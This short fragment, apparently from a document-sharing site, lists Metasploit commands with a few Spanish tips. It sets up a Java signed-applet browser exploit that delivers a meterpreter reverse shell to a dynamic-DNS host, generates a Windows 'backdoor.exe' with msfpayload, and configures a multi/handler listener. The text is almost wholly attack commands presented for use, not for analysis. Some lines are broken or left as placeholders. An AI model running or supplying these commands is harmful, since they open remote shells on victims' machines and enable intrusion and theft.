You are on page 1of 1

sudo msfcli exploit/multi/browser/java_signed_applet PAYLOAD=java/meterpreter/re

verse_tcp LHOST=javasdk.ddns.net URIPATH=/ TARGET=0 E


msfpayload windows/meterpreter/reverse_tcp LHOST=javasdk.ddns.net LPORT=4444 x >
backdoor.exe
ejemplo.no-ip.org:8080
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST javasdk.ddns.net

use exploit/multi/browser/java_signed_applet
set SRVPORT 8080
set URIPATH /
set payload: Luego dejar presionado por unos segundos la tecla (TAB)
set payload windows/meterpreter/reverse_tcp
set LHOST (IP pub) ej: 186.149.91.240
set LPORT

You might also like